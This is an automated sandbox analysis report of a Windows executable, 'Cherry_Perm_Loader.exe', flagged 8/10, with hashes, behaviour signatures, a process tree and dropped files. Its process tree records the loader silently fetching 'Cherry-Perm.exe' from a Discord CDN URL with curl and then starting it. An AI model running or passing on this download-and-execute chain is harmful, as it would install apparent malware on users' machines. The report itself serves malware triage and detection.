Analysis

  • max time kernel
    1111s
  • max time network
    1114s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-03-2023 20:48

General

  • Target

    Cherry_Perm_Loader.exe

  • Size

    5.2MB

  • MD5

    a2a7b11ea0218d976421a3175b746073

  • SHA1

    074036ae04df474d68fd04e8d910a09b3f5b7a6c

  • SHA256

    5278f2641212c12b3604728d983b64c55da8037aa9d29d38bd338890c1b4253c

  • SHA512

    428d34eeedd711b3367da4184de8d051da08fac59ab0936a27597d4fa0c8fe24585a411167838545434a1b663993200b9957c97cba1b3fe02f5fa257db9e90cf

  • SSDEEP

    98304:YQo5KB5D5+CPb5TXWA7vzKXq/WNxNjR1zFr9DvdHIY:YQIQDbPb5Tmbq/0jvDvh

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Cherry_Perm_Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\Cherry_Perm_Loader.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4164
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start https://discord.gg/cherryy
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:972
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/cherryy
        3⤵
        • Enumerates system info in registry
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:4496
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffac87346f8,0x7ffac8734708,0x7ffac8734718
          4⤵
            PID:2996
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,12628321070568685938,1499787891835344596,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
            4⤵
              PID:3768
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,12628321070568685938,1499787891835344596,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4968
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,12628321070568685938,1499787891835344596,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8
              4⤵
                PID:4108
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12628321070568685938,1499787891835344596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:1
                4⤵
                  PID:3660
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12628321070568685938,1499787891835344596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
                  4⤵
                    PID:2480
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12628321070568685938,1499787891835344596,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2836 /prefetch:1
                    4⤵
                      PID:4916
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2140,12628321070568685938,1499787891835344596,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=2820 /prefetch:8
                      4⤵
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4196
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2140,12628321070568685938,1499787891835344596,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5192 /prefetch:8
                      4⤵
                        PID:2744
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12628321070568685938,1499787891835344596,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
                        4⤵
                          PID:5844
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12628321070568685938,1499787891835344596,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
                          4⤵
                            PID:5836
                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,12628321070568685938,1499787891835344596,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5252 /prefetch:8
                            4⤵
                              PID:6128
                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                              4⤵
                              • Drops file in Program Files directory
                              PID:5312
                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff64b8c5460,0x7ff64b8c5470,0x7ff64b8c5480
                                5⤵
                                  PID:2116
                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,12628321070568685938,1499787891835344596,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5252 /prefetch:8
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3720
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12628321070568685938,1499787891835344596,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
                                4⤵
                                  PID:5528
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12628321070568685938,1499787891835344596,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
                                  4⤵
                                    PID:5512
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077788693533827132/1088686794733785128/Cherry-Perm.exe -o Cherry-Perm.exe --silent
                                2⤵
                                  PID:1800
                                  • C:\Windows\system32\curl.exe
                                    curl https://cdn.discordapp.com/attachments/1077788693533827132/1088686794733785128/Cherry-Perm.exe -o Cherry-Perm.exe --silent
                                    3⤵
                                      PID:1616
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c start Cherry-Perm.exe
                                    2⤵
                                      PID:5484
                                      • C:\Users\Admin\AppData\Local\Temp\Cherry-Perm.exe
                                        Cherry-Perm.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: GetForegroundWindowSpam
                                        PID:5500
                                  • C:\Windows\System32\CompPkgSrv.exe
                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                    1⤵
                                      PID:968

                                    Network

                                    MITRE ATT&CK Matrix ATT&CK v6

                                    Discovery

                                    System Information Discovery

                                    2
                                    T1082

                                    Query Registry

                                    1
                                    T1012

                                    Command and Control

                                    Web Service

                                    1
                                    T1102

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                      Filesize

                                      152B

                                      MD5

                                      78c7656527762ed2977adf983a6f4766

                                      SHA1

                                      21a66d2eefcb059371f4972694057e4b1f827ce6

                                      SHA256

                                      e1000099751602ae1adcec6f1c74e1d65f472936817b45239dfed4b043984296

                                      SHA512

                                      0a8e58ae95163b3cdf8e81b5085887761e73cb7c836a1a6a972e837fb3df69b2ac70cfd6311d06d40656344ec35eb48e512f007561480f0345486ac2b329be0b

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                      Filesize

                                      152B

                                      MD5

                                      099b4ba2787e99b696fc61528100f83f

                                      SHA1

                                      06e1f8b7391e1d548e49a1022f6ce6e7aa61f292

                                      SHA256

                                      cdb1db488e260ed750edfe1c145850b57ee8ab819d75237a167e673116a33ee8

                                      SHA512

                                      4309375e10785564ceb03e0127ced414e366a5b833f16a60d796471d871b479e4c044db5268902d9dfd14715ca577cb26042bab8f7b0f31fe8abf33947feb9d1

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                      Filesize

                                      48B

                                      MD5

                                      dc8f6b6801dcbeb34e3390f902b4ff52

                                      SHA1

                                      0dca0c972b5a4386abcc0c1d362e17dc4ed854b0

                                      SHA256

                                      2ff7ef29ccd6b80ef1d53834d8dd4c1861ba2504754373906aad416b22df4b2e

                                      SHA512

                                      a5df4ee1fb20a687874851a99e4c644020717e3e643b2714d34ceb4b505aa31281013aa01ce3db32ab3191e3d6d200a22067cd8a0692f62b31b0d2b679d70323

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                      Filesize

                                      408B

                                      MD5

                                      6da448edabc6cfdbaba4f44d6b179fcc

                                      SHA1

                                      fb49ab2f598cbb147983f357435e5a3fb6dc8c39

                                      SHA256

                                      82004a853e91ca74b5cb77403bcc497e140eafacd31597e2f7acc4c68f7cfeac

                                      SHA512

                                      df9dea3e0d1604c1923dccfe4fe3445ea45d4f5a31fe9db5d158527b3388a6744e47c5099c6df075733dd67f37969d68ff2560d8cfe1aacd54fab7bbcbcd100b

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
                                      Filesize

                                      70KB

                                      MD5

                                      e5e3377341056643b0494b6842c0b544

                                      SHA1

                                      d53fd8e256ec9d5cef8ef5387872e544a2df9108

                                      SHA256

                                      e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

                                      SHA512

                                      83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000001.dbtmp
                                      Filesize

                                      16B

                                      MD5

                                      46295cac801e5d4857d09837238a6394

                                      SHA1

                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                      SHA256

                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                      SHA512

                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001
                                      Filesize

                                      41B

                                      MD5

                                      5af87dfd673ba2115e2fcf5cfdb727ab

                                      SHA1

                                      d5b5bbf396dc291274584ef71f444f420b6056f1

                                      SHA256

                                      f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                      SHA512

                                      de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
                                      Filesize

                                      2KB

                                      MD5

                                      f0ac372de0d41fd2fea019a87d53fbeb

                                      SHA1

                                      267f04b22513373e98876bfbb48b255783f1abf8

                                      SHA256

                                      ea79c9982a46654fab829d4108bb1482080ec85ad8a76bbc1a06ef91cbb7bac9

                                      SHA512

                                      15d72e7adbb4ddb8b297173ddde7586e63e31409231644ef2bd448626b7ed8c4a0af671590fd7387ad752e343b62be224659bc9dd0f1294b38143eeb94d866c0

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                      Filesize

                                      111B

                                      MD5

                                      285252a2f6327d41eab203dc2f402c67

                                      SHA1

                                      acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                      SHA256

                                      5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                      SHA512

                                      11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                      Filesize

                                      656B

                                      MD5

                                      3ede5b62e9368745efcde97512d7d87c

                                      SHA1

                                      c6dafe68b74952273c000252af248871a778f895

                                      SHA256

                                      3864f3bb0dd82c77406f5d32a3e59dc22dddaf41c22baefc5485e2d94a070876

                                      SHA512

                                      d1745c78094e194ae94919d9b1eb401b32a63d70e4617ec0bf9e1118264d924d360cfda49068b4c0aefca46e4eec659fc28c8d834c43f4d8dfa5ab013bdf3c90

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                      Filesize

                                      5KB

                                      MD5

                                      4d76651e56690d244ef2a011685f1cbd

                                      SHA1

                                      33206eaf537072f7433a4a089a49b047ee858b9b

                                      SHA256

                                      f66470d6d5987bc84603d9d0109dfa932754b1a89b9366c01076c7c919eca022

                                      SHA512

                                      b8af0540082eb2cd6a3f23cb46b8f619458856e7cddd7b27101710d03550b195a8efc66da024088d3c23b2a108c17cb1f235a1f52b10ebc1fb27211afeaa4f3f

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                      Filesize

                                      4KB

                                      MD5

                                      1b362af6810bf292cd66d83bf3bce97d

                                      SHA1

                                      7be462512fe1a684615ddce521591a34500c9629

                                      SHA256

                                      0b7bf91f27700ed93f6652571fe7036b2c436f98585c2c064eb243322403ca8b

                                      SHA512

                                      342c1defd9dcbce851d49ac8dfab1bfd59799a3cffacb96a24765191de7941af6fd5175a563d9b5ffdf624e1b105542369276c2d1a079bdebaffdd8770ecccd6

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                      Filesize

                                      6KB

                                      MD5

                                      2383078b9f7916c8b74cc1a85568bdeb

                                      SHA1

                                      cc2209ae8d425b43f90903f1696e0442dda25f05

                                      SHA256

                                      43ec8da68e0b35ce6364054d47231375116958d32a81e2b04371b62298a1431c

                                      SHA512

                                      722c72a8157e3827713b1f05a82732989bb1924c833637d500bb1e9ac3f340f04779c76600ea4c5875d1f2e656fb622946a9146c71387fa7f4e1b7e25600c75c

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
                                      Filesize

                                      24KB

                                      MD5

                                      02ee7addc9e8a2d07af55556ebf0ff5c

                                      SHA1

                                      020161bb64ecb7c6e6886ccc055908984dc651d8

                                      SHA256

                                      552d3ed359b7a52278ce621674d16428d8a7969f6cd5663df18e240cce66aadc

                                      SHA512

                                      567989543c3848a0c3276d96b96ca761f750e4b71fb74f36d809f590ffe16a72fd5ece251737a8b1ffe65f0051e211bd7ad19d2b8b0b7ca1b7ffc86dd2a52883

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                      Filesize

                                      16B

                                      MD5

                                      206702161f94c5cd39fadd03f4014d98

                                      SHA1

                                      bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                      SHA256

                                      1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                      SHA512

                                      0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
                                      Filesize

                                      264KB

                                      MD5

                                      f50f89a0a91564d0b8a211f8921aa7de

                                      SHA1

                                      112403a17dd69d5b9018b8cede023cb3b54eab7d

                                      SHA256

                                      b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                      SHA512

                                      bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                      Filesize

                                      12KB

                                      MD5

                                      35dfc8237dc42f4eeb9ae36e55a989e6

                                      SHA1

                                      dfe160b51ef317630004daf35035af3c31cb117a

                                      SHA256

                                      5a7aa0be8135f4e3c6a4b8409a9782c1f5e6a49b13a858e2c4fce88c1eddf134

                                      SHA512

                                      0820e315057567a7d419f75c0f40e2d6d7af7de804fe80613f756597b33fb4b76a7fcd253d853b5caa2c90f6b12be4c2b9c4bd155dee53907639bbb5927e8d23

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                      Filesize

                                      9KB

                                      MD5

                                      926935024354a96fe10694d26e13cad4

                                      SHA1

                                      6bf286e1f27636cdb44f199ed9d77d2d7f5f2b98

                                      SHA256

                                      1060752737f2bd6baf72387710e104d13f23ad33408ae917d849bd4bf26df634

                                      SHA512

                                      e697078cbf815db674d9d2ebb1c3969509d37c50682a508665eabe33105e79c929d3f9218c13511af5ec4dcf3bfc3f6a26347863ca74e9a8885fb2177092b2d0

                                    • C:\Users\Admin\AppData\Local\Temp\Cherry-Perm.exe
                                      Filesize

                                      529KB

                                      MD5

                                      48e824532ee18957efcd25de8db1ab8d

                                      SHA1

                                      69b69dd39610847b519207dc1df9eb2fcac45552

                                      SHA256

                                      6ce6241fcdac25682688563760d1fb949929ce95fb174fd93dbf8d1fee53b00a

                                      SHA512

                                      15027bdae0cf4d5a18426de5d14157bf450cb5d22d6bd34ac692a831eb4c9dfb4ed9b74dd24861577a516cce070949782e47145a3b9fa0946f35ebcfbe8bafc2

                                    • C:\Users\Admin\AppData\Local\Temp\Cherry-Perm.exe
                                      Filesize

                                      529KB

                                      MD5

                                      48e824532ee18957efcd25de8db1ab8d

                                      SHA1

                                      69b69dd39610847b519207dc1df9eb2fcac45552

                                      SHA256

                                      6ce6241fcdac25682688563760d1fb949929ce95fb174fd93dbf8d1fee53b00a

                                      SHA512

                                      15027bdae0cf4d5a18426de5d14157bf450cb5d22d6bd34ac692a831eb4c9dfb4ed9b74dd24861577a516cce070949782e47145a3b9fa0946f35ebcfbe8bafc2

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
                                      Filesize

                                      3KB

                                      MD5

                                      626584cbf90d06990959915dab6018f5

                                      SHA1

                                      0a2ad07de63d8d8aa8935d88b11f26df6a693b48

                                      SHA256

                                      95cf59f676964267234dbebaf3ccde006905cfdb09da3f05ab5500cc6fe062cd

                                      SHA512

                                      d9400ecb4c42d3bcfd378cb945051a98f9435bf00a3e2540894fd02a24232aa725e2a9578b32b74d10b051447e9673cb56582de5f4996426964734f9bf710382

                                    • \??\pipe\LOCAL\crashpad_4496_NRGMIDQXSNGUDOHN
                                      MD5

                                      d41d8cd98f00b204e9800998ecf8427e

                                      SHA1

                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                      SHA256

                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                      SHA512

                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                    • memory/4164-133-0x00007FFAE7350000-0x00007FFAE7352000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/4164-134-0x00007FF6338A0000-0x00007FF63412E000-memory.dmp
                                      Filesize

                                      8.6MB